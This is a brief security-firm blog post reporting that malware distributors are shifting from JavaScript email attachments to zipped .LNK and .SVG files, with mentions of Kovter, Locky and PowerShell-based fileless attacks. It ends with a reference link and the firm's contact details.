According to Microsoft’s Malware Protection Center, malware distributors are now moving away from one of the more popular malware distribution file formats, which has typically been Java Script (JS). Malware distributors are now using zipped .LNK and .SVG file types to spread malware payloads more efficiently and with more stealth. The security researcher’s analysis was based on examining malicious Powershell scripts that had been attached and downloaded such as the Kovter Trojan Malware. This technique is known to have been used in the past. It was also used to distribute the popular Locky Ransomware. As well, now Powershell code can also be used in distributing fileless cyber-attacks. The fileless attacks can be launched directly from computer system memory, which makes this style of attack more ominous.

Before this blog on simple malicious files, Google has had plans to block Java Script file attachments in its Gmail aplication starting in February of 2017. Unfortunately, because Google has decided to block such attachments it has also forced malicious threat actors to research and discover alternative malware distribution techniques. However, for malware distributors to use LNK and JS files it is easy to ban as an email attachment but the SVG file would be a tad bit more difficult because it’s a widely used image format.

Reference: http://www.itworld.com/article/2694022/security/hackers-make-drive-by-download-attacks-stealthier-with-fileless-infections.html


For more information about Redport’s information assurance and cyber security services, visit www.redport-ia.com, email us at info@redport-ia.com, like us on Facebook, and follow us on Twitter@redport_ia.